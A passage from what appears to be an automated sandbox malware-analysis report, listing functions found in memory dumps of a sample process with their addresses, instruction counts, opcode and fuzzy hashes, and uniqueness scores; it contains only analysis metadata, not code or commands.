                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: c21c4765fc901ee220c120db3adc7f9dc71ed82f944582ac6c8c70a9e542cfb0
                                                                                                                                                                                                                                                  • Instruction ID: 31dcf301d80e2b6f8d46ed1e095d659c9e6b966e5ad3f15e8cee40593126f3b6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c21c4765fc901ee220c120db3adc7f9dc71ed82f944582ac6c8c70a9e542cfb0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08118E31E5220A9FCB50DF69ED848AFBBBAFBC5211F10402AE609D7311DB309955CBE0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 06633B20 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950464108.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6630000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 08732739008adb4b7335d664860ff6255f4486d86620a19dafc2ad53cabc84eb
                                                                                                                                                                                                                                                  • Instruction ID: 150e43007830ac573c5d0d4d70578b69497e217a173ce1bdfba59d2d76481dc5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08732739008adb4b7335d664860ff6255f4486d86620a19dafc2ad53cabc84eb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C213070E0021ADFCB45EFA8D9549AEFBB1EF44300F118519D519A73A0EB34AD46CF81
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065FEBD2 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: a2bd5e6d785c771777e3571454b91996813e1627827204cc0aa701d55b395c2b
                                                                                                                                                                                                                                                  • Instruction ID: 924f18ee37c29c76d08645f2776abcbeeeeeea60f1c01254cd73fdf0ae6631c7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a2bd5e6d785c771777e3571454b91996813e1627827204cc0aa701d55b395c2b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2911E030600206AFCB55AF64EC4486ABFB6FF85210B04C629E9969B361CB30FC45CBB0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 06633B8E Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950464108.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6630000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: e1d0e1c0824769b28b90a5dd068e52b986d303beb7f700a201fa1bd7b6a39c33
                                                                                                                                                                                                                                                  • Instruction ID: 6b70f3524e45a2abad79abbb8902e5b34c850ddae521549b91e31c9c35f49a1d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1d0e1c0824769b28b90a5dd068e52b986d303beb7f700a201fa1bd7b6a39c33
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08113030E00619CFCB44EBB8D894BADBBB2EF88300F108159E515BB3A0DF749881CB54
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065F23A8 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 08ba30bc19d3b82c39a212010a1090748ec766dc432953f6f5a3fe261173d223
                                                                                                                                                                                                                                                  • Instruction ID: ad7bcc2e22b57c6c1c766117ade5eaceb25865fef0dae126d63438e08ed93e5a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08ba30bc19d3b82c39a212010a1090748ec766dc432953f6f5a3fe261173d223
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09114C71A00606AFCB50EF69D98099EF7F6FF84210B104A29D52597714EB70FE89CBE4
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065F1C30 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 702e5d7cea2c63360356b600efec879ccb5299539f9a9394895121bfc17adb95
                                                                                                                                                                                                                                                  • Instruction ID: 38f4293eceb17399120765229c908f2cc0becd2467a30825340678e198be782a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 702e5d7cea2c63360356b600efec879ccb5299539f9a9394895121bfc17adb95
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D10192323042007FC7559B689858E6EBFEAFBC9660B14815AF90ACB391DB319D05C7A5
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065F4EF8 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 53832cc8ec224bed32faddb9c3a3ff04be854fb31571de2ec626ae97555d7a16
                                                                                                                                                                                                                                                  • Instruction ID: 0dcef15e211940b627037da1bf5963b6f857273136c9683de4d1d247a5528062
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 53832cc8ec224bed32faddb9c3a3ff04be854fb31571de2ec626ae97555d7a16
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EA112731200208CFD765CF65D484A66BBE6FF45361F048469FA0A8F361CB32E890DF60
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065F9FBE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 3550b8833af63a4056884f54c575b8b9b42238b00f1747b722182ebe495bf719
                                                                                                                                                                                                                                                  • Instruction ID: af5fdf416e606139e8b0034eaee279495c6c059d6137bef236598e839a5237d0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3550b8833af63a4056884f54c575b8b9b42238b00f1747b722182ebe495bf719
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA118C34A44159CFDB04CB68C854ADEBFF9BF49310F1880A9E405B7361CB759C44CBA0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065FEBE0 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: a708ed4fac18dd570654f3272209e16006662afdd8c381c72e896616fab92f86
                                                                                                                                                                                                                                                  • Instruction ID: 8f930b1dc2d969ed0f5c5cf982aa10fd24b76fb6b14f3e21b541d1419ce44a06
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a708ed4fac18dd570654f3272209e16006662afdd8c381c72e896616fab92f86
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40118E71A10216AFCB50EF54E88486EBBB6FF84310B00CA29E95697360CB30FD45CFA0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065F2EC8 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 1a7312bd95b5de543f98a0f106608fd3e236b08ed4e0d31a0bf31da3aea5dc29
                                                                                                                                                                                                                                                  • Instruction ID: 206747355a20fd3080db4d8036c9fdffaa3b2f1c2c260b54960a70a7e6766533
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a7312bd95b5de543f98a0f106608fd3e236b08ed4e0d31a0bf31da3aea5dc29
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51019E3061A3858FC749DF74E86846E7FF9EF86200B2445AAE845C7291EF34CE05CB62
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 0669FE16 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1951092425.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6690000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 25b8a65e1c2bee19c2473464c7784980406e7d1487d96c76feaceed7fb14838f
                                                                                                                                                                                                                                                  • Instruction ID: 2ab985bc8757e602ba47cbfe176737218fc01ca9fd5d0749c61114e5d158ef3d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 25b8a65e1c2bee19c2473464c7784980406e7d1487d96c76feaceed7fb14838f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1711D774E00205CFCB58DF65D485D6DBBB2FF88315B1280A8E9119B361DB31E881CFA0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 0669E4A0 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1951092425.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6690000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: c9f68b395a4e1d07ed82938ac536851a825e4c41d94b2d506e2c3e1951c13139
                                                                                                                                                                                                                                                  • Instruction ID: ed6e5a56c36f7e29ecfb912aa91fec84999e3b3bef3eb8b512eee2cca68319b9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c9f68b395a4e1d07ed82938ac536851a825e4c41d94b2d506e2c3e1951c13139
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9411B675A00208EFCF41CFA8D944AA9BBF5EF08214F1484A9E809D7351D332DA61EF61
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 0669FE44 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1951092425.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6690000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 7e18c562725c0167e0dbb8725e8b2f9d07ef38c6b64754d7bdabedce5d8c8483
                                                                                                                                                                                                                                                  • Instruction ID: c0d73aec7f2f9b28d31cce0500d1b70f5cb7c7e3dc24b9f8b4f0fbcb81554052
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e18c562725c0167e0dbb8725e8b2f9d07ef38c6b64754d7bdabedce5d8c8483
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D411B674E00209CFCB58CF65D48596DBBB2FF88325F1254A8E9019B361DB30E881CFA0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065F1C40 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 3b8225c990fc797cd9f3c067e31615a3600a655076e315e90cb447ae3fce3821
                                                                                                                                                                                                                                                  • Instruction ID: 245afd788f0edaebcee1d64d0fb8f280881dc8e154ff183b7e6f10da99c06ffd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b8225c990fc797cd9f3c067e31615a3600a655076e315e90cb447ae3fce3821
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF01D6323001047FC7449B58E854E6E7BEBFBCC260B148029FA0AC7340EF319C0187A8
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065F2328 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: fd9c959942e357ff9269a18e1aaf2d784ceb6db6cef0efca1d304c83e1ad58e7
                                                                                                                                                                                                                                                  • Instruction ID: b82953c7bcc9185a3912c186e28c6e2d26d52b6e8205933d075db365c1992e8c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd9c959942e357ff9269a18e1aaf2d784ceb6db6cef0efca1d304c83e1ad58e7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62018671B101158F8B149BBDE80499EFBF9FFC8211B0181BAE91ED3350EB71E9158B90
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 016BD655 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1934956623.00000000016BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016BD000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_16bd000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 96d11948dfed5e8fcc3b800560bbce2fb38a051a87e655e01f3fba7731f715d9
                                                                                                                                                                                                                                                  • Instruction ID: 4c7c780fcbf23eb21a70f1b60c7d3778c5c0b857fd441b5ec02ab53691548348
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 96d11948dfed5e8fcc3b800560bbce2fb38a051a87e655e01f3fba7731f715d9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1012B310083509AE7118B59CEC47A7FF98EF41328F18C42AED0C4E286D779D881CB71
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 06633926 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950464108.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6630000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 757f05cd518aeb672cfe35004f09e19ae0546816444606a92e92eeba8cf88bb4
                                                                                                                                                                                                                                                  • Instruction ID: 07ccf4a72601841fa35fad71e0a85d76b76249b20ac17254c53740e06f9975a4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 757f05cd518aeb672cfe35004f09e19ae0546816444606a92e92eeba8cf88bb4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2018C70D4526AAEDB10DE69D904BAEBBB9AF84310F044435E401BA7A4EB7C1548CAA2
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065F4E81 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: c9772e7f351e30f11b3e45ffc9118cc64558e6cd5cb69de71d74bbc2127df6dc
                                                                                                                                                                                                                                                  • Instruction ID: fb74bbc6fe836649dba0b45f433487d926cd7f3edf747a8151de677f8c2cd636
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c9772e7f351e30f11b3e45ffc9118cc64558e6cd5cb69de71d74bbc2127df6dc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23016D71E04159AFCB01DBA99C08AFFBFBAEFC9200F08816BE615D6150D7340A15DBA0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 06631710 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950464108.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6630000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 368fdec0fe66358eb912d6fed7f499124831796404a70cb603d6a917d1debf12
                                                                                                                                                                                                                                                  • Instruction ID: 64241d517f357b88bae65f11fbee1eca042fd3c1ac35242de20c18f03a25b569
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 368fdec0fe66358eb912d6fed7f499124831796404a70cb603d6a917d1debf12
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42F06275714214AF87458A2DD8548AFFFEEEB89260314805BF90DC7755DF71AC0287A1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 0669E65A Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1951092425.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6690000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: dc65c368b6818555e83897432b83e660ba452067bae69d54eceb213e7998cd5c
                                                                                                                                                                                                                                                  • Instruction ID: 493af315b7020e551c314af4cde80a7c3273d617c334f715e4e76c7bebd6c3c4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc65c368b6818555e83897432b83e660ba452067bae69d54eceb213e7998cd5c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01016D35604254AFC755CF59D884C9AFBADFF89220715C65AFD08CB342CA71ED41CBA0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065FEE32 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 8cd5beee8b710484d6576a3722e9773cc8e95af5f1302522dea4cd9dc52e0912
                                                                                                                                                                                                                                                  • Instruction ID: 3baf5a3e342a7ff4f1edec455ce6911a9b7b9230c0b18c07724bca273eddb301
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8cd5beee8b710484d6576a3722e9773cc8e95af5f1302522dea4cd9dc52e0912
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7601D630215301AFCB629B24E980657FBEBFF82320B44497ED5494F765DB71E849CBA1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065F9FD0 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: cd7dce8fbee691a5aac7dbaa858de6e6e45e17e5148b94142505ba4b463344d9
                                                                                                                                                                                                                                                  • Instruction ID: 7fac419bde439284aced90c7890daf1207ead7d087bcebb7b9e7ae85634cbf5d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd7dce8fbee691a5aac7dbaa858de6e6e45e17e5148b94142505ba4b463344d9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1011B35A101188FDB04CBA9C944ADEBBF9BF4D310F198065E505B7361DB75AD40CBA1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 0669E400 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1951092425.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6690000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
